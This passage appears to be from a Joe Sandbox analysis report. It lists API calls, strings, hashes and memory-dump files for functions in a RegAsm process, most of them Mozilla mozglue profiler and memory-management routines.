                                                                                    • SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FolderPathlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1699248803-0
                                                                                    • Opcode ID: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                    • Instruction ID: 14537dfbc9dced5e712fe60e3e3a31c8263f1f5987e60415cd97e08317604fbc
                                                                                    • Opcode Fuzzy Hash: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                    • Instruction Fuzzy Hash: 27F01C7990014CBBDB51DB64C8909EDB7FDEBC4704F0091A6A90593280D6349F459B50
                                                                                    Function 00410D6D Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocLocal
                                                                                    • String ID:
                                                                                    • API String ID: 3494564517-0
                                                                                    • Opcode ID: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                    • Instruction ID: 7dcd19726911a1004ec6e1e6dff555a45da34f101be8258439f6e1c6d27db954
                                                                                    • Opcode Fuzzy Hash: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                    • Instruction Fuzzy Hash: AAF05C35601610DB871209599C00AE7775BABC6B10708411BDE8C8B304C5B0ECC142E0

                                                                                    Non-executed Functions

                                                                                    Function 6C70F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C70F09B
                                                                                      • Part of subcall function 6C6E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B85
                                                                                      • Part of subcall function 6C6E5B50: EnterCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B90
                                                                                      • Part of subcall function 6C6E5B50: LeaveCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5BD8
                                                                                      • Part of subcall function 6C6E5B50: GetTickCount64.KERNEL32 ref: 6C6E5BE4
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C70F0AC
                                                                                      • Part of subcall function 6C6E5C50: GetTickCount64.KERNEL32 ref: 6C6E5D40
                                                                                      • Part of subcall function 6C6E5C50: EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E5D67
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C70F0BE
                                                                                      • Part of subcall function 6C6E5C50: __aulldiv.LIBCMT ref: 6C6E5DB4
                                                                                      • Part of subcall function 6C6E5C50: LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6E5DED
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C70F155
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F1E0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F1ED
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F212
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F229
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F231
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C70F248
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F2AE
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F2BB
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F2F8
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F350
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F35D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F381
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F398
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F3A0
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F489
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F491
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C70F3CF
                                                                                      • Part of subcall function 6C70F070: GetCurrentThreadId.KERNEL32 ref: 6C70F440
                                                                                      • Part of subcall function 6C70F070: AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F44D
                                                                                      • Part of subcall function 6C70F070: ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F472
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C70F4A8
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F559
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F561
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F585
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F5A3
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C70F3A8
                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C70F56A
                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C70F499
                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C70F239
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                    • API String ID: 565197838-2840072211
                                                                                    • Opcode ID: 32d67070f367bb0ea6d45767cc66caad8cb9f0d1fb08b314455e2101d3c6c7b5
                                                                                    • Instruction ID: 2bbf6a72a81e9fa62ce3bed21166482b97d739711bfe4e755c8e61d0228e7820
                                                                                    • Opcode Fuzzy Hash: 32d67070f367bb0ea6d45767cc66caad8cb9f0d1fb08b314455e2101d3c6c7b5
                                                                                    • Instruction Fuzzy Hash: 6ED1E7757042149FDB00AF79D5087AA77F9EB8632CF10853BE97543B81DB705908C7AA
                                                                                    Function 6C6D64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6D64DF
                                                                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6D64F2
                                                                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C6D6505
                                                                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C6D6518
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C6D652B
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6D671C
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D6724
                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C6D672F
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D6759
                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C6D6764
                                                                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C6D6A80
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6D6ABE
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D6AD3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D6AE8
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D6AF7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                    • API String ID: 487479824-2878602165
                                                                                    • Opcode ID: 6fc18b5f4b3d3b27d7fdb9b00f7fef0a13feee3f6e901162aa26f852dc123bec
                                                                                    • Instruction ID: e144071ab1ea08fceb18639577190882721ec69b720542bfdc19f0968b511b7e
                                                                                    • Opcode Fuzzy Hash: 6fc18b5f4b3d3b27d7fdb9b00f7fef0a13feee3f6e901162aa26f852dc123bec
                                                                                    • Instruction Fuzzy Hash: EBF1E1709012298FDB20DF24CD88B9AB7B5AF46318F1586E9D809E7681D731FE84CF94
                                                                                    Function 6C6EED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C6EEE7A
                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C6EEFB5
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6F1695
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6F16B4
                                                                                    • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C6F1770
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6F1A3E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$freemallocmemcpy
                                                                                    • String ID: ~qll$~qll
                                                                                    • API String ID: 3693777188-3932955011
                                                                                    • Opcode ID: 9675f19105f122765f5803ddf9dbc7164a2f158c485bbf7e9567901840ec2172
                                                                                    • Instruction ID: 8874348b1b8989a8745e91b24bed29cacf012e1c856ec2cf9fa723faba7bc605
                                                                                    • Opcode Fuzzy Hash: 9675f19105f122765f5803ddf9dbc7164a2f158c485bbf7e9567901840ec2172
                                                                                    • Instruction Fuzzy Hash: EAB31971E05219CFCB14CFA8C890ADDB7B2BF89304F2582A9D459AB745D730AD86CF94
                                                                                    Function 6C6D7810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744), ref: 6C6D7885
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E744), ref: 6C6D78A5
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6D78AD
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6D78CD
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C6D78D4
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C6D78E9
                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6C6D795D
                                                                                    • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C6D79BB
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C6D7BBC
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C6D7C82
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C6D7CD2
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C6D7DAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavememset
                                                                                    • String ID: Dtl$Dtl
                                                                                    • API String ID: 759993129-1464740658
                                                                                    • Opcode ID: f1bacd7f4bddd3a4df88049ee005886a3ff2b4f3ac0f447f0d3799d779325362
                                                                                    • Instruction ID: fe01a28e93e1caa5a51fdd2fcc3104c113a7ba9323465acb8aa37f21515668e4
                                                                                    • Opcode Fuzzy Hash: f1bacd7f4bddd3a4df88049ee005886a3ff2b4f3ac0f447f0d3799d779325362
                                                                                    • Instruction Fuzzy Hash: F1027271E012198FDB54CF29D984799B7B5FF88318F2682AAD809A7715D730BE90CF84
                                                                                    Function 6C707E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpystrlen
                                                                                    • String ID: (pre-xul)$data$name$schema$vtl
                                                                                    • API String ID: 3412268980-3627326370
                                                                                    • Opcode ID: fe1f7113af2cd6e5bc267d8bf88e97e57d2e2c54780e7081c6e6e90bc538555a
                                                                                    • Instruction ID: 50ea9f842e9826b6e2e5369dcf3c9684b20bef1e3290a6e8069de171d5d346f7
                                                                                    • Opcode Fuzzy Hash: fe1f7113af2cd6e5bc267d8bf88e97e57d2e2c54780e7081c6e6e90bc538555a
                                                                                    • Instruction Fuzzy Hash: BCE18FB1B043448BC710CF68894065BF7E9FF89314F15892DE899D7791DBB0ED098B96
                                                                                    Function 6C6ED4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED4F2
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED50B
                                                                                      • Part of subcall function 6C6CCFE0: EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6CCFF6
                                                                                      • Part of subcall function 6C6CCFE0: LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6CD026
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED52E
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C6ED690
                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6ED6A6
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C6ED712
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED751
                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6ED7EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                    • API String ID: 2690322072-3894294050
                                                                                    • Opcode ID: 8ac13ab25e8ffe613973c8081609244a3c48f1ad85d8ab51e83c3f3f2553d09c
                                                                                    • Instruction ID: c8120b5d886e4c483d9b05827560bb1adb690907e6b29813fec18eb439a7598a
                                                                                    • Opcode Fuzzy Hash: 8ac13ab25e8ffe613973c8081609244a3c48f1ad85d8ab51e83c3f3f2553d09c
                                                                                    • Instruction Fuzzy Hash: D991D171A097058FD714DF39C19076AB7E1EBC9328F15892FE5AA87A81D730E844CB86
                                                                                    Function 6C724EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(000007D0), ref: 6C724EFF
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C724F2E
                                                                                    • moz_xmalloc.MOZGLUE ref: 6C724F52
                                                                                    • memset.VCRUNTIME140(00000000,00000000), ref: 6C724F62
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7252B2
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7252E6
                                                                                    • Sleep.KERNEL32(00000010), ref: 6C725481
                                                                                    • free.MOZGLUE(?), ref: 6C725498
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                    • String ID: (
                                                                                    • API String ID: 4104871533-3887548279
                                                                                    • Opcode ID: 94f6b2a99bd6317d417a61c115a65baa70374fd67276d1601177c9c8666a4df5
                                                                                    • Instruction ID: c0155ba2fcbd351ec2c7c296c4eada7acc3d89720e66d624473c683c2f81acd4
                                                                                    • Opcode Fuzzy Hash: 94f6b2a99bd6317d417a61c115a65baa70374fd67276d1601177c9c8666a4df5
                                                                                    • Instruction Fuzzy Hash: 7EF1B171A19B408FC716DF39C85062BB7F9AFD6284F05873EF84AA7651DB31D8428B81
                                                                                    Function 6C705190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C7051DF
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C70529C
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C7052FF
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C70536D
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C7053F7
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C7056C3
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7056E0
                                                                                    Strings
                                                                                    • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C7056BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                                    • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                                    • API String ID: 1227157289-345010206
                                                                                    • Opcode ID: 73d15f2ac2eadd4cf55b1d70dd7607aa3d1dfab18dca193b3b2d7635601650a1
                                                                                    • Instruction ID: d0644920a39dc61982d633d91d267083d4699d5ff9b2c171dcc021c15c6b8e5b
